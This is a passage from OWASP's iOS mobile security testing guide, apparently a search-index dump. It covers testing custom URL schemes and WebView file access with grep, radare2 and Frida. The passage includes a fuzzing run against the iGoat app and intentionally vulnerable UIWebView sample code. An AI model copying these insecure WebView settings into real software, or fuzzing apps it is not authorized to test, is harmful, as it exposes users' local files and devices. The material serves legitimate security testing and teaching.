: verify how the resource is being opened, i.e. how the data is being parsed, verify the options, especially if access by the calling app (sourceApplication
) should be allowed or denied. The app might also need user permission when using the custom URL scheme.In Telegram you will find four different methods being used:
func application(_ application: UIApplication, open url: URL, sourceApplication: String?) -> Bool {\n self.openUrl(url: url)\n return true\n}\n\nfunc application(_ application: UIApplication, open url: URL, sourceApplication: String?,\nannotation: Any) -> Bool {\n self.openUrl(url: url)\n return true\n}\n\nfunc application(_ app: UIApplication, open url: URL,\noptions: [UIApplicationOpenURLOptionsKey : Any] = [:]) -> Bool {\n self.openUrl(url: url)\n return true\n}\n\nfunc application(_ application: UIApplication, handleOpen url: URL) -> Bool {\n self.openUrl(url: url)\n return true\n}\n
We can observe some things here:
application:handleOpenURL:
and application:openURL:sourceApplication:annotation:
.openUrl
method. You can inspect it to learn more about how the URL request is handled.The method openURL:options:completionHandler:
and the deprecated openURL:
method of UIApplication
are responsible for opening URLs (i.e. to send requests / make queries to other apps) that may be local to the current app or it may be one that must be provided by a different app. If you have the original source code you can search directly for usages of those methods.
Additionally, if you are interested into knowing if the app is querying specific services or apps, and if the app is well-known, you can also search for common URL schemes online and include them in your greps. For example, a quick Google search reveals:
Apple Music - music:// or musics:// or audio-player-event://\nCalendar - calshow:// or x-apple-calevent://\nContacts - contacts://\nDiagnostics - diagnostics:// or diags://\nGarageBand - garageband://\niBooks - ibooks:// or itms-books:// or itms-bookss://\nMail - message:// or mailto://emailaddress\nMessages - sms://phonenumber\nNotes - mobilenotes://\n...\n
We search for this method in the Telegram source code, this time without using Xcode, just with egrep
:
$ egrep -nr \"open.*options.*completionHandler\" ./Telegram-iOS/\n\n./AppDelegate.swift:552: return UIApplication.shared.open(parsedUrl,\n options: [UIApplicationOpenURLOptionUniversalLinksOnly: true as NSNumber],\n completionHandler: { value in\n./AppDelegate.swift:556: return UIApplication.shared.open(parsedUrl,\n options: [UIApplicationOpenURLOptionUniversalLinksOnly: true as NSNumber],\n completionHandler: { value in\n
If we inspect the results we will see that openURL:options:completionHandler:
is actually being used for universal links, so we have to keep searching. For example, we can search for openURL(
:
$ egrep -nr \"openURL\\(\" ./Telegram-iOS/\n\n./ApplicationContext.swift:763: UIApplication.shared.openURL(parsedUrl)\n./ApplicationContext.swift:792: UIApplication.shared.openURL(URL(\n string: \"https://telegram.org/deactivate?phone=\\(phone)\")!\n )\n./AppDelegate.swift:423: UIApplication.shared.openURL(url)\n./AppDelegate.swift:538: UIApplication.shared.openURL(parsedUrl)\n...\n
If we inspect those lines we will see how this method is also being used to open \"Settings\" or to open the \"App Store Page\".
When just searching for ://
we see:
if documentUri.hasPrefix(\"file://\"), let path = URL(string: documentUri)?.path {\nif !url.hasPrefix(\"mt-encrypted-file://?\") {\nguard let dict = TGStringUtils.argumentDictionary(inUrlString: String(url[url.index(url.startIndex,\n offsetBy: \"mt-encrypted-file://?\".count)...])) else {\nparsedUrl = URL(string: \"https://\\(url)\")\nif let url = URL(string: \"itms-apps://itunes.apple.com/app/id\\(appStoreId)\") {\n} else if let url = url as? String, url.lowercased().hasPrefix(\"tg://\") {\n[[WKExtension sharedExtension] openSystemURL:[NSURL URLWithString:[NSString\n stringWithFormat:@\"tel://%@\", userHandle.data]]];\n
After combining the results of both searches and carefully inspecting the source code we find the following piece of code:
openUrl: { url in\n var parsedUrl = URL(string: url)\n if let parsed = parsedUrl {\n if parsed.scheme == nil || parsed.scheme!.isEmpty {\n parsedUrl = URL(string: \"https://\\(url)\")\n }\n if parsed.scheme == \"tg\" {\n return\n }\n }\n\n if let parsedUrl = parsedUrl {\n UIApplication.shared.openURL(parsedUrl)\n
Before opening a URL, the scheme is validated, \"https\" will be added if necessary and it won't open any URL with the \"tg\" scheme. When ready it will use the deprecated openURL
method.
If you only have the compiled application (IPA), you can still try to identify which URL schemes are being used to query other apps:
LSApplicationQueriesSchemes
was declared or search for common URL schemes.://
or build a regular expression to match URLs as the app might not be declaring some schemes.You can do that by first verifying that the app binary contains those strings by e.g. using unix strings
command:
strings <yourapp> | grep \"someURLscheme://\"\n
or even better, use radare2's iz/izz
command or rafind2, both will find strings where the unix strings
command won't. Example from iGoat-Swift:
$ r2 -qc izz~iGoat:// iGoat-Swift\n37436 0x001ee610 0x001ee610 23 24 (4.__TEXT.__cstring) ascii iGoat://?contactNumber=\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-for-deprecated-methods","title":"Testing for Deprecated Methods","text":"Search for deprecated methods like:
application:handleOpenURL:
openURL:
application:openURL:sourceApplication:annotation:
For example, here we find those three:
$ rabin2 -zzq Telegram\\ X.app/Telegram\\ X | grep -i \"openurl\"\n\n0x1000d9e90 31 30 UIApplicationOpenURLOptionsKey\n0x1000dee3f 50 49 application:openURL:sourceApplication:annotation:\n0x1000dee71 29 28 application:openURL:options:\n0x1000dee8e 27 26 application:handleOpenURL:\n0x1000df2c9 9 8 openURL:\n0x1000df766 12 11 canOpenURL:\n0x1000df772 35 34 openURL:options:completionHandler:\n...\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#dynamic-analysis","title":"Dynamic Analysis","text":"Once you've identified the custom URL schemes the app has registered, there are several methods that you can use to test them:
To quickly test one URL scheme you can open the URLs on Safari and observe how the app behaves. For example, if you write tel://123456789
in the address bar of Safari, a pop up will appear with the telephone number and the options \"Cancel\" and \"Call\". If you press \"Call\" it will open the Phone app and directly make the call.
You may also know already about pages that trigger custom URL schemes, you can just navigate normally to those pages and Safari will automatically ask when it finds a custom URL scheme.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#using-the-notes-app","title":"Using the Notes App","text":"As already seen in \"Triggering Universal Links\", you may use the Notes app and long press the links you've written in order to test custom URL schemes. Remember to exit the editing mode in order to be able to open them. Note that you can click or long press links including custom URL schemes only if the app is installed, if not they won't be highlighted as clickable links.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#using-frida","title":"Using Frida","text":"If you simply want to open the URL scheme you can do it using Frida:
$ frida -U iGoat-Swift\n\n[iPhone::iGoat-Swift]-> function openURL(url) {\n var UIApplication = ObjC.classes.UIApplication.sharedApplication();\n var toOpen = ObjC.classes.NSURL.URLWithString_(url);\n return UIApplication.openURL_(toOpen);\n }\n[iPhone::iGoat-Swift]-> openURL(\"tel://234234234\")\ntrue\n
In this example from Frida CodeShare the author uses the non-public API LSApplicationWorkspace.openSensitiveURL:withOptions:
to open the URLs (from the SpringBoard app):
function openURL(url) {\n var w = ObjC.classes.LSApplicationWorkspace.defaultWorkspace();\n var toOpen = ObjC.classes.NSURL.URLWithString_(url);\n return w.openSensitiveURL_withOptions_(toOpen, null);\n}\n
Note that the use of non-public APIs is not permitted on the App Store, that's why we don't even test these but we are allowed to use them for our dynamic analysis.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#identifying-and-hooking-the-url-handler-method","title":"Identifying and Hooking the URL Handler Method","text":"If you can't look into the original source code you will have to find out yourself which method the app uses to handle the URL scheme requests that it receives. You cannot know if it is an Objective-C method or a Swift one, or even if the app is using a deprecated one.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#crafting-the-link-yourself-and-letting-safari-open-it","title":"Crafting the Link Yourself and Letting Safari Open It","text":"For this we will use the ObjC method observer from Frida CodeShare, which is an extremely handy script that allows you to quickly observe any collection of methods or classes just by providing a simple pattern.
In this case we are interested in all methods containing \"openURL\", therefore our pattern will be *[* *openURL*]
:
-
and class +
methods.openURL
.$ frida -U iGoat-Swift --codeshare mrmacete/objc-method-observer\n\n[iPhone::iGoat-Swift]-> observeSomething(\"*[* *openURL*]\");\nObserving -[_UIDICActivityItemProvider activityViewController:openURLAnnotationForActivityType:]\nObserving -[CNQuickActionsManager _openURL:]\nObserving -[SUClientController openURL:]\nObserving -[SUClientController openURL:inClientWithIdentifier:]\nObserving -[FBSSystemService openURL:application:options:clientPort:withResult:]\nObserving -[iGoat_Swift.AppDelegate application:openURL:options:]\nObserving -[PrefsUILinkLabel openURL:]\nObserving -[UIApplication openURL:]\nObserving -[UIApplication _openURL:]\nObserving -[UIApplication openURL:options:completionHandler:]\nObserving -[UIApplication openURL:withCompletionHandler:]\nObserving -[UIApplication _openURL:originatingView:completionHandler:]\nObserving -[SUApplication application:openURL:sourceApplication:annotation:]\n...\n
The list is very long and includes the methods we have already mentioned. If we trigger now one URL scheme, for example \"igoat://\" from Safari and accept to open it in the app we will see the following:
[iPhone::iGoat-Swift]-> (0x1c4038280) -[iGoat_Swift.AppDelegate application:openURL:options:]\napplication: <UIApplication: 0x101d0fad0>\nopenURL: igoat://\noptions: {\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.mobilesafari\";\n}\n0x18b5030d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n0x18b502a94 UIKit!-[UIApplication _applicationOpenURLAction:payload:origin:]\n...\n0x1817e1048 libdispatch.dylib!_dispatch_client_callout\n0x1817e86c8 libdispatch.dylib!_dispatch_block_invoke_direct$VARIANT$mp\n0x18453d9f4 FrontBoardServices!__FBSSERIALQUEUE_IS_CALLING_OUT_TO_A_BLOCK__\n0x18453d698 FrontBoardServices!-[FBSSerialQueue _performNext]\nRET: 0x1\n
Now we know that:
-[iGoat_Swift.AppDelegate application:openURL:options:]
gets called. As we have seen before, it is the recommended way and it is not deprecated.igoat://
.com.apple.mobilesafari
.-[UIApplication _applicationOpenURLAction:payload:origin:]
.0x1
which means YES
(the delegate successfully handled the request).The call was successful and we see now that the iGoat app was open:
Notice that we can also see that the caller (source application) was Safari if we look in the upper-left corner of the screenshot.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#dynamically-opening-the-link-from-the-app-itself","title":"Dynamically Opening the Link from the App Itself","text":"It is also interesting to see which other methods get called on the way. To change the result a little bit we will call the same URL scheme from the iGoat app itself. We will use again ObjC method observer and the Frida REPL:
$ frida -U iGoat-Swift --codeshare mrmacete/objc-method-observer\n\n[iPhone::iGoat-Swift]-> function openURL(url) {\n var UIApplication = ObjC.classes.UIApplication.sharedApplication();\n var toOpen = ObjC.classes.NSURL.URLWithString_(url);\n return UIApplication.openURL_(toOpen);\n }\n\n[iPhone::iGoat-Swift]-> observeSomething(\"*[* *openURL*]\");\n[iPhone::iGoat-Swift]-> openURL(\"iGoat://?contactNumber=123456789&message=hola\")\n\n(0x1c409e460) -[__NSXPCInterfaceProxy__LSDOpenProtocol openURL:options:completionHandler:]\nopenURL: iGoat://?contactNumber=123456789&message=hola\noptions: nil\ncompletionHandler: <__NSStackBlock__: 0x16fc89c38>\n0x183befbec MobileCoreServices!-[LSApplicationWorkspace openURL:withOptions:error:]\n0x10ba6400c\n...\nRET: nil\n\n...\n\n(0x101d0fad0) -[UIApplication openURL:]\nopenURL: iGoat://?contactNumber=123456789&message=hola\n0x10a610044\n...\nRET: 0x1\n\ntrue\n(0x1c4038280) -[iGoat_Swift.AppDelegate application:openURL:options:]\napplication: <UIApplication: 0x101d0fad0>\nopenURL: iGoat://?contactNumber=123456789&message=hola\noptions: {\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"OWASP.iGoat-Swift\";\n}\n0x18b5030d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n0x18b502a94 UIKit!-[UIApplication _applicationOpenURLAction:payload:origin:]\n...\nRET: 0x1\n
The output is truncated for better readability. This time you see that UIApplicationOpenURLOptionsSourceApplicationKey
has changed to OWASP.iGoat-Swift
, which makes sense. In addition, a long list of openURL
-like methods were called. Considering this information can be very useful for some scenarios as it will help you to decide what your next steps will be, e.g. which method you will hook or tamper with next.
You can now test the same situation when clicking on a link contained on a page. Safari will identify and process the URL scheme and choose which action to execute. Opening this link \"https://telegram.me/fridadotre\" will trigger this behavior.
First of all we let frida-trace generate the stubs for us:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\n -m \"*[* *application*URL*]\" -m \"*[* openURL]\"\n\n...\n7310 ms -[UIApplication _applicationOpenURLAction: 0x1c44ff900 payload: 0x10c5ee4c0 origin: 0x0]\n7311 ms | -[AppDelegate application: 0x105a59980 openURL: 0x1c46ebb80 options: 0x1c0e222c0]\n7312 ms | $S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData\n 18applicationContext20navigationController12dismissInputy0A4Core7AccountC_AA14Open\n URLContextOSSSbAA012PresentationK0CAA0a11ApplicationM0C7Display010NavigationO0CSgyyctF()\n
Now we can simply modify by hand the stubs we are interested in:
The Objective-C method application:openURL:options:
:
// __handlers__/__AppDelegate_application_openUR_3679fadc.js\n\nonEnter: function (log, args, state) {\n log(\"-[AppDelegate application: \" + args[2] +\n \" openURL: \" + args[3] + \" options: \" + args[4] + \"]\");\n log(\"\\tapplication :\" + ObjC.Object(args[2]).toString());\n log(\"\\topenURL :\" + ObjC.Object(args[3]).toString());\n log(\"\\toptions :\" + ObjC.Object(args[4]).toString());\n},\n
The Swift method $S10TelegramUI15openExternalUrl...
:
// __handlers__/TelegramUI/_S10TelegramUI15openExternalUrl7_b1a3234e.js\n\nonEnter: function (log, args, state) {\n\n log(\"TelegramUI.openExternalUrl(account, url, presentationData,\" +\n \"applicationContext, navigationController, dismissInput)\");\n log(\"\\taccount: \" + ObjC.Object(args[1]).toString());\n log(\"\\turl: \" + ObjC.Object(args[2]).toString());\n log(\"\\tpresentationData: \" + args[3]);\n log(\"\\tapplicationContext: \" + ObjC.Object(args[4]).toString());\n log(\"\\tnavigationController: \" + ObjC.Object(args[5]).toString());\n},\n
The next time we run it, we see the following output:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\n -m \"*[* *application*URL*]\" -m \"*[* openURL]\"\n\n 8144 ms -[UIApplication _applicationOpenURLAction: 0x1c44ff900 payload: 0x10c5ee4c0 origin: 0x0]\n 8145 ms | -[AppDelegate application: 0x105a59980 openURL: 0x1c46ebb80 options: 0x1c0e222c0]\n 8145 ms | application: <Application: 0x105a59980>\n 8145 ms | openURL: tg://resolve?domain=fridadotre\n 8145 ms | options :{\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.mobilesafari\";\n }\n 8269 ms | | TelegramUI.openExternalUrl(account, url, presentationData,\n applicationContext, navigationController, dismissInput)\n 8269 ms | | account: nil\n 8269 ms | | url: tg://resolve?domain=fridadotre\n 8269 ms | | presentationData: 0x1c4c51741\n 8269 ms | | applicationContext: nil\n 8269 ms | | navigationController: TelegramUI.PresentationData\n 8274 ms | -[UIApplication applicationOpenURL:0x1c46ebb80]\n
There you can observe the following:
application:openURL:options:
from the app delegate as expected.application:openURL:options:
handles the URL but does not open it, it calls TelegramUI.openExternalUrl
for that.tg://resolve?domain=fridadotre
.tg://
custom URL scheme from Telegram.It is interesting to see that if you navigate again to \"https://telegram.me/fridadotre\", click on cancel and then click on the link offered by the page itself (\"Open in the Telegram app\"), instead of opening via custom URL scheme it will open via universal links.
You can try this while tracing both methods:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -m \"*[* *application*openURL*options*]\"\n\n// After clicking \"Open\" on the pop-up\n\n 16374 ms -[AppDelegate application :0x10556b3c0 openURL :0x1c4ae0080 options :0x1c7a28400]\n 16374 ms application :<Application: 0x10556b3c0>\n 16374 ms openURL :tg://resolve?domain=fridadotre\n 16374 ms options :{\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.mobilesafari\";\n}\n\n// After clicking \"Cancel\" on the pop-up and \"OPEN\" in the page\n\n406575 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c063d0c0\n restorationHandler:0x16f27a898]\n406575 ms application:<Application: 0x10556b3c0>\n406575 ms continueUserActivity:<NSUserActivity: 0x1c063d0c0>\n406575 ms webpageURL:https://telegram.me/fridadotre\n406575 ms activityType:NSUserActivityTypeBrowsingWeb\n406575 ms userInfo:{\n}\n406575 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-for-deprecated-methods_1","title":"Testing for Deprecated Methods","text":"Search for deprecated methods like:
application:handleOpenURL:
openURL:
application:openURL:sourceApplication:annotation:
You may simply use frida-trace for this, to see if any of those methods are being used.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-url-schemes-source-validation","title":"Testing URL Schemes Source Validation","text":"A way to discard or confirm validation could be by hooking typical methods that might be used for that. For example isEqualToString:
:
// - (BOOL)isEqualToString:(NSString *)aString;\n\nvar isEqualToString = ObjC.classes.NSString[\"- isEqualToString:\"];\n\nInterceptor.attach(isEqualToString.implementation, {\n onEnter: function(args) {\n var message = ObjC.Object(args[2]);\n console.log(message)\n }\n});\n
If we apply this hook and call the URL scheme again:
$ frida -U iGoat-Swift\n\n[iPhone::iGoat-Swift]-> var isEqualToString = ObjC.classes.NSString[\"- isEqualToString:\"];\n\n Interceptor.attach(isEqualToString.implementation, {\n onEnter: function(args) {\n var message = ObjC.Object(args[2]);\n console.log(message)\n }\n });\n{}\n[iPhone::iGoat-Swift]-> openURL(\"iGoat://?contactNumber=123456789&message=hola\")\ntrue\nnil\n
Nothing happens. This tells us already that this method is not being used for that as we cannot find any app-package-looking string like OWASP.iGoat-Swift
or com.apple.mobilesafari
between the hook and the text of the tweet. However, consider that we are just probing one method, the app might be using another approach for the comparison.
If the app parses parts of the URL, you can also perform input fuzzing to detect memory corruption bugs.
What we have learned above can now be used to build your own fuzzer in the language of your choice, e.g. in Python and call the openURL
using Frida's RPC. That fuzzer should do the following:
openURL
..ips
) in /private/var/mobile/Library/Logs/CrashReporter
.The FuzzDB project offers fuzzing dictionaries that you can use as payloads.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#using-frida_1","title":"Using Frida","text":"Doing this with Frida is pretty easy, as explained in this blog post, which shows an example that fuzzes the iGoat-Swift app (working on iOS 11.1.2).
Before running the fuzzer we need the URL schemes as inputs. From the static analysis we know that the iGoat-Swift app supports the following URL scheme and parameters: iGoat://?contactNumber={0}&message={0}
.
$ frida -U SpringBoard -l ios-url-scheme-fuzzing.js\n[iPhone::SpringBoard]-> fuzz(\"iGoat\", \"iGoat://?contactNumber={0}&message={0}\")\nWatching for crashes from iGoat...\nNo logs were moved.\nOpened URL: iGoat://?contactNumber=0&message=0\nOK!\nOpened URL: iGoat://?contactNumber=1&message=1\nOK!\nOpened URL: iGoat://?contactNumber=-1&message=-1\nOK!\nOpened URL: iGoat://?contactNumber=null&message=null\nOK!\nOpened URL: iGoat://?contactNumber=nil&message=nil\nOK!\nOpened URL: iGoat://?contactNumber=99999999999999999999999999999999999\n&message=99999999999999999999999999999999999\nOK!\nOpened URL: iGoat://?contactNumber=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\n&message=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\nOK!\nOpened URL: 
iGoat://?contactNumber=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\n&message=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\nOK!\nOpened URL: iGoat://?contactNumber='&message='\nOK!\nOpened URL: iGoat://?contactNumber=%20d&message=%20d\nOK!\nOpened URL: iGoat://?contactNumber=%20n&message=%20n\nOK!\nOpened URL: iGoat://?contactNumber=%20x&message=%20x\nOK!\nOpened URL: iGoat://?contactNumber=%20s&message=%20s\nOK!\n
The script will detect if a crash occurred. On this run it did not detect any crashes but for other apps this could be the case. We would be able to inspect the crash reports in /private/var/mobile/Library/Logs/CrashReporter
or in /tmp
if it was moved by the script.
For the static analysis we will focus mostly on the following points having UIWebView
and WKWebView
under scope.
Look out for usages of the above mentioned WebView classes by searching in Xcode.
In the compiled binary you can search in its symbols or strings like this:
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0076/#uiwebview","title":"UIWebView","text":"$ rabin2 -zz ./WheresMyBrowser | egrep \"UIWebView$\"\n489 0x0002fee9 0x10002fee9 9 10 (5.__TEXT.__cstring) ascii UIWebView\n896 0x0003c813 0x0003c813 24 25 () ascii @_OBJC_CLASS_$_UIWebView\n1754 0x00059599 0x00059599 23 24 () ascii _OBJC_CLASS_$_UIWebView\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0076/#wkwebview","title":"WKWebView","text":"$ rabin2 -zz ./WheresMyBrowser | egrep \"WKWebView$\"\n490 0x0002fef3 0x10002fef3 9 10 (5.__TEXT.__cstring) ascii WKWebView\n625 0x00031670 0x100031670 17 18 (5.__TEXT.__cstring) ascii unwindToWKWebView\n904 0x0003c960 0x0003c960 24 25 () ascii @_OBJC_CLASS_$_WKWebView\n1757 0x000595e4 0x000595e4 23 24 () ascii _OBJC_CLASS_$_WKWebView\n
Alternatively you can also search for known methods of these WebView classes. For example, search for the method used to initialize a WKWebView (init(frame:configuration:)
):
$ rabin2 -zzq ./WheresMyBrowser | egrep \"WKWebView.*frame\"\n0x5c3ac 77 76 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfC\n0x5d97a 79 78 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfcTO\n0x6b5d5 77 76 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfC\n0x6c3fa 79 78 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfcTO\n
You can also demangle it:
$ xcrun swift-demangle __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfcTO\n\n---> @nonobjc __C.WKWebView.init(frame: __C_Synthesized.CGRect,\n configuration: __C.WKWebViewConfiguration) -> __C.WKWebView\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/","title":"Testing WebView Protocol Handlers","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#static-analysis","title":"Static Analysis","text":"If a WebView is loading content from the app data directory, users should not be able to change the filename or path from which the file is loaded, and they shouldn't be able to edit the loaded file.
This presents an issue especially in UIWebView
s loading untrusted content via the deprecated methods loadHTMLString:baseURL:
or loadData:MIMEType:textEncodingName: baseURL:
and setting the baseURL
parameter to nil
or to a file:
or applewebdata:
URL schemes. In this case, in order to prevent unauthorized access to local files, the best option is to set it instead to about:blank
. However, the recommendation is to avoid the use of UIWebView
s and switch to WKWebView
s instead.
Here's an example of a vulnerable UIWebView
from \"Where's My Browser?\":
let scenario2HtmlPath = Bundle.main.url(forResource: \"web/UIWebView/scenario2.html\", withExtension: nil)\ndo {\n let scenario2Html = try String(contentsOf: scenario2HtmlPath!, encoding: .utf8)\n uiWebView.loadHTMLString(scenario2Html, baseURL: nil)\n} catch {}\n
The page loads resources from the internet using HTTP, enabling a potential MITM to exfiltrate secrets contained in local files, e.g. in shared preferences.
When working with WKWebView
s, Apple recommends using loadHTMLString:baseURL:
or loadData:MIMEType:textEncodingName:baseURL:
to load local HTML files and loadRequest:
for web content. Typically, the local files are loaded in combination with methods including, among others: pathForResource:ofType:
, URLForResource:withExtension:
or init(contentsOf:encoding:)
.
Search the source code for the mentioned methods and inspect their parameters.
Example in Objective-C:
- (void)viewDidLoad\n{\n [super viewDidLoad];\n WKWebViewConfiguration *configuration = [[WKWebViewConfiguration alloc] init];\n\n self.webView = [[WKWebView alloc] initWithFrame:CGRectMake(10, 20,\n CGRectGetWidth([UIScreen mainScreen].bounds) - 20,\n CGRectGetHeight([UIScreen mainScreen].bounds) - 84) configuration:configuration];\n self.webView.navigationDelegate = self;\n [self.view addSubview:self.webView];\n\n NSString *filePath = [[NSBundle mainBundle] pathForResource:@\"example_file\" ofType:@\"html\"];\n NSString *html = [NSString stringWithContentsOfFile:filePath\n encoding:NSUTF8StringEncoding error:nil];\n [self.webView loadHTMLString:html baseURL:[NSBundle mainBundle].resourceURL];\n}\n
Example in Swift from \"Where's My Browser?\":
let scenario2HtmlPath = Bundle.main.url(forResource: \"web/WKWebView/scenario2.html\", withExtension: nil)\ndo {\n let scenario2Html = try String(contentsOf: scenario2HtmlPath!, encoding: .utf8)\n wkWebView.loadHTMLString(scenario2Html, baseURL: nil)\n} catch {}\n
If only having the compiled binary, you can also search for these methods, e.g.:
$ rabin2 -zz ./WheresMyBrowser | grep -i \"loadHTMLString\"\n231 0x0002df6c 24 (4.__TEXT.__objc_methname) ascii loadHTMLString:baseURL:\n
In a case like this, it is recommended to perform dynamic analysis to ensure that this is in fact being used and from which kind of WebView. The baseURL
parameter here doesn't present an issue as it will be set to \"null\" but could be an issue if not set properly when using a UIWebView
. See \"Checking How WebViews are Loaded\" for an example about this.
In addition, you should also verify if the app is using the method loadFileURL: allowingReadAccessToURL:
. Its first parameter is URL
and contains the URL to be loaded in the WebView, its second parameter allowingReadAccessToURL
may contain a single file or a directory. If containing a single file, that file will be available to the WebView. However, if it contains a directory, all files on that directory will be made available to the WebView. Therefore, it is worth inspecting this and in case it is a directory, verifying that no sensitive data can be found inside it.
Example in Swift from \"Where's My Browser?\":
var scenario1Url = FileManager.default.urls(for: .libraryDirectory, in: .userDomainMask)[0]\nscenario1Url = scenario1Url.appendingPathComponent(\"WKWebView/scenario1.html\")\nwkWebView.loadFileURL(scenario1Url, allowingReadAccessTo: scenario1Url)\n
In this case, the parameter allowingReadAccessToURL
contains a single file \"WKWebView/scenario1.html\", meaning that the WebView has exclusively access to that file.
In the compiled binary:
$ rabin2 -zz ./WheresMyBrowser | grep -i \"loadFileURL\"\n237 0x0002dff1 37 (4.__TEXT.__objc_methname) ascii loadFileURL:allowingReadAccessToURL:\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#testing-webview-file-access","title":"Testing WebView File Access","text":"If you have found a UIWebView
being used, then the following applies:
file://
scheme is always enabled.file://
URLs is always enabled.file://
URLs is always enabled.Regarding WKWebView
s:
file://
scheme is also always enabled and it cannot be disabled.file://
URLs by default but it can be enabled.The following WebView properties can be used to configure file access:
allowFileAccessFromFileURLs
(WKPreferences
, false
by default): it enables JavaScript running in the context of a file://
scheme URL to access content from other file://
scheme URLs.allowUniversalAccessFromFileURLs
(WKWebViewConfiguration
, false
by default): it enables JavaScript running in the context of a file://
scheme URL to access content from any origin.For example, it is possible to set the undocumented property allowFileAccessFromFileURLs
by doing this:
Objective-C:
[webView.configuration.preferences setValue:@YES forKey:@\"allowFileAccessFromFileURLs\"];\n
Swift:
webView.configuration.preferences.setValue(true, forKey: \"allowFileAccessFromFileURLs\")\n
